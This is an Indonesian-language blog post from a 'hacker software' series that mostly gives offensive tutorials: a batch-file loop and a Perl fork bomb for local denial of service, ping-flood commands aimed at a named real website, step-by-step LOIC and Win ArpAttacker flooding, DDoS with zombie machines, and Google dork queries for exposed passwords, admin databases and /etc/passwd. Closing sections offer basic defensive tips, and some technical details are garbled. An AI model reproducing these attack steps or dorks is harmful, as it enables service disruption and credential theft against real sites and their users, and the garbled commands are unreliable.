SOFTWARE-HACKER-JAGO-PART-11.html

KUMPULAN SOFTWARE HACKER

ANDA JAGONYA

BAG 1 PART 11

Dikumpulkan oleh KAMDANI.BA (Belum Apa apa)

 

233. Serangan Local DoS

·         Buka Task Manager untuk mengetahui pemakaian CPU sebelum melakukan serangan.

·         Buka Notepad untuk mengetik kode sbb:.

:x

mkdir Dos-Attack

goto x

Simpan file tsb. dg nama : local-dos.bat

Untuk mendapat ekstensi .bat pada waktu kotak dialog penyimpanan muncul pada bag. File name
> isikan local-dos.bat

Pada Bag. Save as type > All Files

·         Klick > Save

·         Jalankan Windows Explorer dan cari file local-dos.bat

·         Jalankan file tsb.

·         Pada Windows Vista, Windows 7, 8

·         Muncul jendela Command Prompt yg menunjukkan aksi DoS

·         Buka kembali Task Manager untuk melihat peningkatan pemakaian CPU yg terjadi.

·         Bila Pentium 1 komputer pasti hang. Pada computer yg baik kenaikkan aktivitas CPU menjadi 63 %.

·         Untuk menghentikan Tutup saja jendela Command Prompt.

·         Pada computer yg baik seperti Pentium i3, serangan script :

#!/usr/bin/perl

For (1..100) { fork or last }

1 while ++$i

Peningkatan aktivitas CPU ternyata 100 %

 

234. Serangan PING OF DEATH

Pada perintah PING kita tambahkan parameter l (huruf L kecil)

Parameter itu untuk mengubah ukuran default buffer yg dikirimkan.

Defaultnya 32 bytes. Dg PING of DEATH paket yg dikirim 65.535 byte. Akibatnya crash pada computer target.

Peintahnya : ping –l <besar buffer> ip-address/domain-target

Contoh : ping –l www.griyakharisma.com 1000

Proses ini mengirim data 1000 paket data ke target

Selain opsi –l , ada opsi –t untuk pengiriman tidak hanya 4 kali.

Tetapi terus menerus mengirimkan sampai hang atau down.

ping –t ip-address/domain-target

Ctrl + C > untuk menghentikan proses.

Kedua opsim digabungakan menjadi :

ping –t –l <besar-buffeer> ip-address/domain-target

 

235. LOIC

Software : LOIC (Low Orbit Ion Cannon).

Software bekerja baik pada internet dg kecepatan tinggi.

Bekerja baik pada satu atau banyak komputer sekali gus.

·         Jalankan program LOIC

·         Pada Bag. Select your target > Masukkan URL target >

·         Klick Lock On

·         Muncul IP Target

·         Pada Bag. Attact Option atur nilai timeout > Nilai max, 9001

·         Pilih metode penyerangan : TCP, UDP, HTTP

·         Nilai dan metode perlu di gonta ganti agar hasilnya maximal.Scanner

·         Klick > IMMA CHARGIN MAH LAZER

·         Pada Bag. Attact Status, tampak jalannya penterangan.

·         Klick Stop Flooding > untuk mengakhiri penyerangan

 

236. WIN ARPATTACKER

Software : Win ArpAttacker

Software : Atelier Web Security Port

Untuk melakukan serangan flooding.

·         Jalankan program Win ArpAttacker

·         Klick icom Scan

·         Muncul berbagai informasi dan IP Target

·         Check list pada Nomor IP target yg dipilih.

·         Klick Option > Klick Attact

·         Dalam kotak dialog > Atur nilai dll. Masukkan nilai max ?

·         Klick OK > Pada icon Attack > Klick Flood

·         Pada computer target terjadi error. Tampak pada Print Screen

Atau pesan yg muncul : The Connection has timed out

Anda bisa melakukan berbagai penyaerangan. Aktivitas serangan dapat dilihat pada Bag. Status
dibawah Menu Utama.

Yg ada tulisan Flooding mission started successfully dll,

Jalankan program Atelier Web Security Port Scanner

Sewaktu pemeriksaan port, mulai dari Port 1. Terjadi pengiriman data terus menerus sehingga target sibuk

Klick TCP > Masukkan nama target > Klick Start (icon kapal layar)

Pada computer target dan computer lain yg tadi diperiksa portnya terjadi error atau pesan Network Error
atau The Connection has timed out. Kita tetap bisa membuka Website lainnya.

Sesudah serangan distop, kita bisa mengakses nya lagi.

 

237. DDoS

http::whoi.webhosting.info/nomor-IP

Program LOIC

Distributed Denial of Service

Banyak computer sekaligus menyerang satu komputer. Banyak komputer itu merupakan satu komunitas
atau menggunakan komputer Zombie (komputer peantara). Komputer Zombie bisa dikendalikan oleh komputer
penyerang utama dg memasukkan Trojan Horse. Pertama ada serangan DDoS th 1999 yg menyebabkan beberapa
server web internet mengalami downtime.

PING FLOOD adalah serangan DDoS yg sangat besar. Pengiriman packet data per detik 150.000 request paket
Internet Control Message Protocol (ICMP).

Perintah dari Dos : ping –t website-target.com

Kirim pesan : Halo apa ada orang disitu ? Jawab : Ya sini ada orang.

Tetapi kiriman ribuan perdetik oleh banyak computer sekaligus.

Bila satu IP dari satu Website yg menggunakan Shared IP yaitu satu IP digunakan bersama sama beberapa
komputer (Area Hotspot) berarti banyak computer yg terkenakan serangan..

http::whoi.webhosting.info/nomor-IP untuk melihat apakah website menggunakan Shared IP apa tidak.
Gantilah nomor IP yg Anda peroleh waktu menggunakan ping. Bila website itu menggunakan Private
IP Address maka yg ternena hanya satu.

Program LOIC juga dapat dipakai untuk serangan DDoS

 

238. GOOGLE HACKING

Menemukan bug (kesalahan) pada website satu persatu memerlukan waktu lama. Google Hacking berguna
untuk mempermudah hacking.

Google memiliki spider laba laba yg disebut CRAWLER. Secara berkala spider mengunjungi situs internet untuk
mencatat informasi dan perubahannya dan menyimpan informasi itu pada file indeks. Robot yg ditugaskan untuk
menjelajah dunia disebut GOOGLEBOT. Nama nama nya : CUSCO, SCOOTER, DEEPHOT Trio detektip Google
menilai situs
dg caranya masing masing. Mereka mencari info utama dari tittle-tag, HTML tag dan meta tag.
Menelusuri teks, memeriksa robot.txt yg memuat informasi apakah boleh diteruskan apa tidak.

Syntax yg digunakan dalam Google Hacking :

Intitle, allintitle, inurl, allinurl, site, filetype, related, cache, intext, index of, link, phonebook, define, info

Untuk membatasi pencarian Google hanya pada judul atau title.

intitle:username password (tanpa tanda kutip)

Tampil halaman yg menggunakan username dan password.

allintitle:password.mdb (tanpa tanda kutip)

Membatasi hanya pada password dan mdb.

intitle dapat digabung dg syntaks lainnya. Allintitle tidak dapat.

inurl:admin.mdb (tanpa tanda kutip)

inurl:”guest | book””html allowed” (tanda | pipeline = operator OR)

inurl:password.log >

Mendapat nama user, password dan alamat URL

Membatasi pada URL yg mengandung kata kunci yg dicari.

Misal : users,mtb, customer.mtb

allinurl:admin pass (tanpa tanda kutip)

Menghasilkan URL yg hanya terdapat pada query pencarian utama.

Kata admin terdapat pada URL, kata pass terdapat pada halaman isi.

allinurl tidak dapat digabung dg syntaks lain.

allinurl:etc/passwd (tanpa tanda kutip)

Menghasilkan URL yg berisi dua kata tsb. etc dan passwd

Kita dapat memperoleh sederetan password. Atau forbiddent.

allinurl:winnt/system32/

Untuk menampilkan semua link yg memberi akses pada directory system32. Directory system32 ini terlarang.
Sebab disana ada file server, file cmd.exe. Kalau Anda berhasil masuk kesana Anda dapat mengendalikan
system komputer.

Site: > hacker site:namasitus,com (tanpa tanda kutip)

hacker site:Microsoft.com (tanpa tanda kutip)

Untuk membatasi pencarian query hanya pada situs tertentu

Hasil pencarian halaman yg berisi kata hacker pada situs tertentu.

filetype:pdf site:go.id pajak )tanpa tanda kutip)

Untuk mencari file dg ekstensi tertentu. doc, xls, ppt, pdf, mdb, txt dsb.

Menghasilkan semua situs go.id yg memiliki file.pdf tentang pajak.

filetype:xls”pass”

filetype:xls”password”

filetype:xls”password.dat”

related:www.kompas.com (tanpa tanda petik)

untuk menampilkan daftar situs yg mirip dg kompas.

cache:www.goal.com (tanpa tanda kutip)

Menampilkan daftar web yg telah terdaftar pada indeks Google

Menampilkan daftar yg disimpan dalam Google untuk halaman goal.com.

cache: >> Untuk menampilkan situs yg telah dihapus. Situs bosen.net ditampilkan dg cara biasa tidak bisa
tampil, baru kita pakai > cache:bosen.net >> Sekarang tampil.

intext::admin (tanpa tanda kutip)

Menampilkan kata kata pada body situs tertentu dg mengabaikan link, URL dan judul halaman.

Menghasilkan link situs yg memiliki kata admin.

intext:Administrator Login

allintext: Administrator Login

intext: dapat digabung dg syntax lainnya sehingga lebih berbahaya.

Syntex index of sangat berbahaya karena mencari situs yg menampilkan index browsing directory. Contoh:

index 0f /admin

index 0f /password

index 0f /pass

index 0f /mail

index 0f /backup”

index 0f /\”+passwd

index 0f /\”+password.txt

index 0f /\”+.htaccess

index 0f /secret\”

index 0f /confidential\”

index 0f /root\”

index 0f /cgi-bin\”

index 0f /credit-card\”

index 0f /logs\”

index 0f /config\”

index 0f /admin.asp

index 0f /login.asp

link:atunez.net

Mencari Website apa saja yg mempunyai link ke website atunez.net

phonebook:Michael Jackson+CA” >> Mencari semua oarng yg bernama Michael Jackson diseluruh California
Phonebook: baru dapat dipakai untuk Amerika.

define:hacker” (tanpa tanda kutip) >> Menampilkan definisi kata hacker menurut banyak ahli.

Info:namasitus.com >> Menampilkan informasi situs yg dicari.

Memeriksa Subdomain dan mencari Alamat Host

inurl:namasitus.com-www > Misal inurl:astaga.com-www > untuk mengetahui subdomain apa saja yg
terdapat pada astaga.com

Bisa juga dg disambung > -site:www.namasitus.com

Contoh : site:goal.com –site:www.goal.com

Hasilnya ada worldcup dsb.

GOOGLE SETS

http://labs.google.com/sets >> Klick Large Set Atau Small Set

Google akan memprediksi nama nama subdomain lainnya.

OPERATOR DAN LOGIKA BOOLEAN yg dipakai Google

AND (huruf capital) atau + (plus)

RotiANDBakar” >> Mencari kata roti dan bakar

Roti Bakar >> Hasilnya sama dg “RotiANDBakar”

OR (huruf capital) atau | (pipeline) - (minus)

Lotus OR Excel >> Mencari salah satu kata Lotus atau Excel

- (minus) (boleh dibaca kecuali) >> Tidak menampilkan kata yg mengandung - (minus)

satu*tiga” (tanda asterisk) >> Hasilnya beragam. Satu dua tiga, satu tambah tiga dsb.

psikolog*’ >> Hasilnya bukan > psikologi

ro.i (.) titik >> Hasilnya bisa roti, rozi, rosi, ro-I dsb.

ikan mati” (tanda kutip) >> Hasilnya ikan mati

Contoh Menggabungkan syntax :

intitle:”index of /dokumen”

intitle:”index of /publikasi”

intitle:”index of””Good Charlotte” >> (nama band)

intitle:”index of””skripsi”site:ac.id >> (ac,id = universitas di Indonesia)

intitle:”index of” password.txt site:my >> my = Malaysia

intitle:”index of” admin.mdb >> Mencari database Administrator tanpa bantuan filetype:

intitle:”index of” member.mdb >> Mencari database members

Security AND (Hacking OR Cracking)

Hasilnya lebih baik bila menggunakan +, -, * dari pada AND, OR,

HASIL PENCARIAN terdiri dari 3 Bagian.

1.      Judul

2.      Dua baris isi

3.      Alamat URL

 

239. GOOGLE HACK

Software : Google Hacks

http://code.google.com/p/googlehacks/

Anda dapat mencari beraneka file. Musik, buku, video, torrent, program, font, lirik lagu, password.

Pada Bag. Search String masukkan judul lagu maupun penyaninya.

Pada Bag. File Types masukkan file yg Anda cari. MP3, WMA, OGG dll.

Klick Search > Muncul halaman hasil pencarian > Klick file.

Software : http://johnny.ihackstuff.com/ghdb.php

GOOGLE DORKS

Google Hacks juga disebut Google Dorks. Dalam Software tsb diatas terdapat banyak keyword seputar
Google Dorks

 

240. ANTI HACKING

PASTIKAN ANTI VIRUS ANDA UP TO DATE

Pada umumnya software hacking yg menyerang komputer kita bisa dideteksi oleh Anti Virus. Karena itu demi
keamanan Anti Virus Anda pakailah yg Up to Date

Anti Virus Luar nagari : AVG Anti Virus, Avira

Anti Virus Local : Smadv

AVG Anti Virus yg belum di Up Date biasanya tampil pesan merah : You are not fully protected > Update Now.
Tunggu 1 s/d 2 jam >

Restart komputer > You are Protected warna hijau

 

241. ANTI HACKING ANDROID

Jangan download sembarangan apalagi gratisan. Download dari tempat yg jelas aman. Misal dari Play Store

Jangan mudah meminjamkan HP kepada orang lain

Hindari mengisi aplikasi dan game dari counter HP

Jangan sembarangan mencolok kabel data ke laptop yg tidak jelas anti virusnya. Check anti virus
Up Date apa belum

 

242. PASANG ANTI KEYLOGGER

Software : AntiLogger

Install > Pada bagian Keystroke Encryption > On

 

243. MENGAMANKAN JARINGAN WIRELESS

a.       Lebih baik pasanglah Password enkripsi WPA2 dari pada tidak

b.      Kalau terpaksa memakai WEP, ganti password secara berkala

c.       Gunakan enkripsi yg lebih besar dari 64 bit

d.      Gantilah semua setting default, mulai dari user name, password, SSID, IP Address

e.       Jangan menggunakan password dari kata sehari hari. Buatlah kombinasi huruf, angka, karakter yg panjang

f.       Sembunyikan SSID

g.      Aktipkan MAC Address Filtering sehingga tahu siapa saja yg boleh mengaccess jaringan wireless Anda

h.      Update access point atau wireless router jika ada firmware baru. Biasanya ada tambahan security
seperti CaptivePortal dll

i.        Gunakan firewall bawaan maupun program tambahan

j.        Kalau ada fasilitas pencatatan log (Logging) aktipkan. Supaya tahu koneksi jaringan wireless

k.      Jika Access poin Anda memiliki fitur HTTPS, aaktipkan fitur ini.

HTTPS akan meng enkripsi data yg mempersulit sniffing

l). Non Aktipkan system DHCP Server, Buatlah IP Static untuk setiap komputer yg boleh mengakses
jaringan wireless Anda

m). Pisahkan jaringan LAN dg jaringan wireless untuk mencegah penyusupan ke server Anda

n). Sering memonitoring terhadap klien yg terhubung dg jaringan wireless Anda. Gunakan fitur Access Poin
Monitoring via Client

m). Jika Anda memakai Hotspot gratisan, kalau ada kecurigaan ada sesuatu yg tidak beres pada jaringan tsb.
Jangan mengakses internet pada Web penting seperti Internet Banking, transaksi Online

o). Apabila Anda sebagai klient tidak menggunakan sharing, folder dan printer sebaiknya dimatikan

p). Gunakan pengamanan berlapis

q). Matikan access point Anda kalau sudah tidak Anda pakai

 

 

Klik LANJUTKAN

http://www.hackerkamdani.blogspot.com/KUMPULAN-SOFTWARE-KAMDANI.html


Pustaka :

Efvy Zam : BUKU SAKTI HACKER Mediakita 2014

Yudha Yogasara :GOOGLE DORKS Penerbit Neomedia Press Semarang

WAHANA KOMPUTER : Koleksi Software Gratis untuk Hacking & Cracking Penerbit ANDI Semarang

Dedik Kurniawan & Java Creativity BUKU SAKTI TEKNIK HACKING Penerbit PT ELEX MEDIA KOMPUTINDO

Rudy Samuel Pardosi KALI LINUX TOP HACKING Jasakom

Efvy Zam Kerinci GOOGLE HACKING Penerbit Neomedia Press Semarang

Efvy Zamidra Zam WIRELESS HACKING Edisi Revisi

Penerbit PT ELEX MEDIA KOMPUTINDO

Zuhardi Eko Rahman HACK RAPIDSHARE & ATTACK Friendster

Penerbit Neomedia Press Semarang

Jordan Andrean cs HACKING STREAMING

Penerbit PT ELEX MEDIA KOMPUTINDO

Dedik Kurniawan & Java Creativity HACKING dengan KEYLOGGER Penerbit PT Elex Media Komputindo Jakarta

Muhammad Syukri Yudha Yogasara : TEKNIK HACKING UNTUK PEMULA

 

Penerbit PT Elex Media Komputindo Jakarta

 

MundzirMF : TIP & TRIK BELAJAR HACKER

 

Penerbit NOTEBOOK Yogyakarta 55187

 

Efvy Zamidra Zam : Trik Hacking Menggunakan Flash Disk

 

PT Elex Media Komputindo Jakarta

 

Komentar

Posting Komentar

Postingan populer dari blog ini

SOFTWARE-HACKER-JAGO-PART-14.html

KUMPULAN SOFTWARE HACKER ANDA JAGONYA Dikumpulkan oleh KAMDANI.BA (Belum Apa apa) BAGIAN 2 C Anda telah membaca Software Hacker Anda Jagonya Bagian 1. Apabila Anda sudah bisa menggunakan dan sudah terlatih menggunakan software hacker yg tersedia didalamnya maka itu berarti Anda sudah dipersiapkan untuk menjadi seorang hacker yg sebenarnya meskipun sebenarnya masih menjadi seorang kiddies. Kiddies itu tingkatan paling rendah dari seorang hacker. Baru bisa menggunakan Software buatan orang lain. Belum bisa membuat program sendiri . Tingkatan berikutnya Hacking Group (Defacer, Cracker dan Carder), Hacktivist , Black Hat Profesionals , Organized Criminal Gangs, Nation States dan The Automated Tools. Pada Bagian 2A, 2B, 2C, Anda diantar kepintu gerbang jalan raya menuju dan menjadi seorang HACKER PROFESIONAL. Karena i...
Baca selengkapnya

SOFTWARE-HACKER-JAGO-PART-8.html

KUMPULAN SOFTWARE HACKER ANDA JAGONYA BAG 1 PART 8 Dikumpulkan oleh KAMDANI.BA(Belum Apa apa) 178. SENI MENEBAK PASSWORD Password umum : Password yg mudah dibaca karena memakai kata kata yg umum. Contoh : rahasia1, password1. 123456 dsb. Password Menggunakan nama : Ada nama depan, nama tengah dan nama belakang. Nama anak, binatang, bunga dsb Password Tanggal lahir : Akik1274, Bungadesember dsb. Password Rumah, kantor, sekolah dsb. Hasanudin32, sma6, dsb Password nama hewan : Kucing, brony dsb. Password ABG (kata kata gaul) Begichu, Password tokoh faforit : Nama tokoh cartun dsb Password Nama Penting : 4 digit nomor HP dsb. 179. DEFAULT PASSWORD Default password adalah bawaan mesin dari sononya. Dan belum diubah. Biasanya menggunakan kata “user” atau “admin” Software untuk menemukan password default : http://www.vulnerabilityassesment.co.uk/passwords.htm http://www.defaultpassword....
Baca selengkapnya

SOFTWARE-HACKER-JAGO-PART-9.htmll

KUMPULAN SOFTWARE HACKER ANDA JAGONYA BAG 1 PART 9 Dikumpulkan oleh KAMDANI.BA (Belum Apa apa)   196. KEYLOGGER PRO UNTUK FIREFOX Add Ons Mozilla Firefox Kalau dilihat dari Menu Add Ons bernama My Music a ). buka Browser Mozilla firefox b). Buka situs Ekstensi Keylogger https://addons.mozilla.org/en-US/firefox/addon/keylogger- 220858/ ?src =cb-dl=users c). Atau buka situs Ekstensi Mozilla Firefox. Gunakan kata kunci : Keylogger d). Klick Add To Firefox untuk install e). Restart computer f). Tekan Ctrl + L untuk Buat Password > OK g). Login ke Facebook, Tweeter, Email h). Ctrl + L, Masukkan Password anda > OK i). Password yg dicari sudah tampil   197. NIFTY KEYLOGGER UNTUK FIREFOX Seperty diatas, tetapi hasilnya lebih jelas a ). Buka Browser Mozilla Firefox b). Buka situs Ekstensi Nifty Keylogger https://addons.mozilla.org/en-US/firefox/ad...
Baca selengkapnya